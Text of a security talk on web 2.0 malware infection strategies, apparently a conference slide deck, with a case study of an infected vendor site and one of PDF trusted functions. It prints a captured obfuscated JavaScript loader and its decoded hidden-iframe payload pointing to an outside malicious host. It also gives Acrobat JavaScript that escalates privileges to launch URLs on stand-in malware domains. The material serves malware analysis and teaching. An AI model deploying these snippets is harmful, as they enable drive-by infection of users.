Scaling Web 2.0 Malware Infection______________________________________

Aditya K Sood, Sr. Security Practitioner

Armorize , Santa Clara US

Disclaimer

All contents of this presentation represent my own beliefs and views and do not, unless

explicitly stated otherwise, represent the beliefs of my current, or any of my previous in

that effect, employers.

About Me - $whoami

• Senior Security Practitioner , Armorize

http://www.armorize.com

• Founder , SECNICHE Security.

http://www.secniche.org

• Worked previously for COSEINC as Senior Security Researcher and Security

Consultant for KPMG

• Written content Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals.

• Like to do Bug Hunting and Malware dissection.

• Released Advisories to Forefront Companies.

• Active Speaker at Security Conferences including RSA etc.

Agenda

Understanding The Malware Anatomy

The Vertical Risk – Malware Impact on Business

Top 10+ Web Malware Infection Strategies

2X Generation - Century Malware Trickeries

Case Study – Infection through PDF Trusted Functions

Demonstration

Pattern

Understanding The Malware Anatomy

The Dependent Peripherals

Malware Mess – Global Trifecta

Malware Infection Rate

Malware Retrospective and Classification

Trojan (31.2 %)

Downloader (25.6 %)

Backdoor (13.8 %)

Spyware (13.2 %)

Adware (4.9%)

Top 5 Malware Categories Top 5 Virus Families

Stuh (4.4 %)

Fraudload (3.9 %)

Monder (3.6 %)

Autorun (2.7 %)

Buzus (2.7 %)

Interdependency

Malware - The Impact on Real World

Malware Trends – The Attack Base

Financial abuse and mass identity theft

The mass destructor – Botnet infection and zombie hosts

Exploiting the link dependency – Pay Per click hijacking

Traffic manipulation – Open redirect vulnerabilities at large scale

Spywares , crypto virology , ransom ware etc

Distributed Denial of Service – The service death game , extortion

Industry change semantics – Malware activation change line

Infection through browsers and portable gadgets – the biggest step

Exploiting anti virus loopholes

Malware Contributing Issues – Rising Steps

Publicly available malware source code

Malware distribution framework such MPACK , NeoSploit etc.

Unpatched vulnerabilities and loosely coupled patches

Demand of underground services and self exposure

Global surveillance mode and information stealing in the wild

Software discrepancies and inherited design flaws such as Browsers.

Exploitation at web level is easy. It opens a door to System Level Fallacies.

Inappropriate security solutions deployed and irrelevant security paradigm

Botnet Infection – The easy way to launch diversified attack

Web sharing and centralized work functionality.

Pattern

Understanding The Vertical Risk

Web Delivered Malware Impact on Business

Underground Market and Malware Flow Model

Underground Malware Market Business - Statistics

© GDATA

Practical Malware Flow Model

© Reihe Informatik. TR-2007-011

Malware Writers Role

Flow of Malware Websites

Malware - The Impact on Real World

Pattern

Malware – Sources of Infection

Web 2.0

Top 10 + Strategies of Distributing Malware through Web

Long Live Drive By Download – Base Web Malware Tactic

(SEO) Poisoning – Driven with Malware

Messengers – Infection at Instant State

Networking Websites – TWITTER Malware Infection

Exploiting the trust relationship on Social Networking Websites

Spreading malware content through Tweets , Scrapping etc

Chain Reaction – Dwells very fast in Website Networks (URL Shortening Trick)

Social Networking – FACEBOOK Malware Applications

Manipulating the Open API Calls

User centric control

Exploiting the design fallacies

Social Networking – FACEBOOK MAIL Infection

Step 1

Step 2

Step 3

Online Media Content – You Tube, Google Videos etc !!

Exploiting the Web of Trust – Human Touch

Spywares , Ransom Wares and other Variants etc.

Insidious Spamming – Email , Blogs , Redirectors etc

Botnets – Malware Infection at Large Scale

Direct Malware Hosting – Infected Web Domains

System Stringency – Exploiting the Exceptions

Malware Kits – Automated Infection

Case Study – Safety Labs Malware Infection

Malware Infecting the Security Service Provider Websites.

____________________________________________________________

It is unfortunate that even the Security Solution Provider is also touched by the latest Internet IFRAME

threats or rather say infections

Thousands of websites on internet have been compromised with malicious Iframes which load exploit

code designed to silently install trojans onto susceptible victim computers.

Case Study – Safety Labs Malware Infection

Case Study – Safety Labs Malware Infection

OBFUSCATED JAVASCRIPT

<SCRIPT LANGUAGE=JAVASCRIPT>

FUNCTION MDBAN(X){VAR L=X.LENGTH,B=1024,I,J,R,P=0,S=0,W=0,T=ARRAY(63,9,52,47,48,11,7,35,

59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,

0,58,40,31,60

,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);FOR(J=MATH.CEIL(L/B);J>0;J--

){R='';FOR(I=MATH.MIN(L,B);I>0;I--,L--){{W

|=(T[X.CHARCODEAT(P++)-48])<<S;IF(S){R+=STRING.FROMCHARCODE(221^W&255);W>>=8;S-

=2}ELSE{S=6}}}EVAL(R);}}MDBAN('ZT8M

VN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9

QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5ML

E0DMXICGRAD

F@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5

Y7@HD')</SCRIPT><!-- 213.219.250.100 -->

Script Source is

http://www.safety-lab.com/audits/categorylist.pl?lang=en

Case Study – Safety Labs Malware Infection

DEOBFUSCATED JAVASCRIPT

(1) DECODED JAVASCRIPT EVALS()

WINDOW.STATUS = 'DONE';

DOCUMENT.WRITE('<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?' + MATH.ROUND(MATH.RANDOM() *

14490) + '5B8F' + '" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"></IFRAME>')

(2) DECODED JAVASCRIPT WRITES RESULT

<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?58965B8F" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE">

</IFRAME>

HTTP://3PIGS.INFO/T/?58965B8F “ was

injected as source for malicious file.

Complexity factor is always high in decoding the malicious JavaScript.

2X Generation Malware Trickeries

System File Patching and Code Injection

Code Interdependency – Malware Adjacency - Code Resuscitation.

Code Randomization, Obfuscation and Morphing

Rootkits and System Cloaking

Exploiting Active X and JavaScript Heaps – Direct Control

Private & Confidential Property of Armorize

Escaping What !

Malware Analysis Methodology (MAM) - Overview

End Point Communication Connection state check

Server identity checks through communication medium.

Error generation like Checksum Integrity.

Encrypted data in packets.

Protocol Switching.

Session Stream Analysis – Deep Inspection

Analyzing TCP stream session

Extracting an executable from the raw data

Behavioral Analysis – Scrutinizing system fallacies Active debugging

Black Box Testing approach

Static Analysis – Reversing the facets of malwareIts all about analyzing the code of Malware

Case Study – Malware Infection

PDF Trusted Functions

(Understanding the Facets of Malware)

Some PDF Truths

Hyperlink execution notification as alerts

Data is not allowed to be stored in the forms

http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf

Number of vulnerable functions have been removed i.e. from registered state

Support for Adobe reader 7.xx has been removed

http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html

Other alerts have been structured as security checks in standalone PDF’s

ACRO JS does not support DOM as normal JavaScript does.

Adobe has inbuilt functionality to provide a code wrappers which calls restricted functions in

specific environments. For example:- In general, it is not possible to generate another PDF

from the standalone PDF when it is opened

Understanding Malware Infection - PDF

Exploiting the browser – Downloading files through Windows Media Player

Exploiting the Global Access of JavaScript folder in PDF

Hidden gift.js file containing malicious code is placed here

Understanding Malware Infection - PDF

Calling Codes through Trusted Functions

Trusted function body calls the app.beginPriv (begin privileges) and app.endPriv(end

privileges) to enclose any type of function and code to be trusted.

The trusted functions method can be called successfully on the initialization of the

application and it is possible to call certain number of restricted functions through it.

myTrustedFunction = app.trustedFunction(

function() { <function body> } );

New Scareware Message – Opening a new PDF

trustedDoc = app.trustedFunction( function (width,height)

{ app.beginPriv();

var trustDoc = app.newDoc(width,height);

trustDoc.addWatermarkFromText("X JERKED X");

app.endPriv();

return trustDoc; })

trustedDoc(300,300);

Understanding Malware Infection - PDF

Calling Codes through Trusted Propagator Functions

myPropagatorFunction = app.trustPropagatorFunction(

function() { <function body> }

URL Opening - Drive by Download Infections

trustedDoc = app.trustedFunction

(

function (cURL, bNewFrame)

{

app.beginPriv();

var trustedDoc = app.launchURL(cURL, bNewFrame);

app.endPriv();

return trustedDoc;

}

)

trustedDoc("http://www.malware1.com",true);

trustedDoc("http://www.malware2.com",true);

trustedDoc("http://www.malware3.com",true);

trustedDoc("http://www.malware4.com",true);

trustedDoc("http://www.malware5.com",true);

Understanding Malware Infection - PDF

Demonstration

Questions and Queries

Thanks and Regards

Special thanks to Armorize for pushing me to do more research.

http://www.armorize.com

__________________________________________________________________________________

Portal and Blog

SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com

(Screenshots shared from various resources)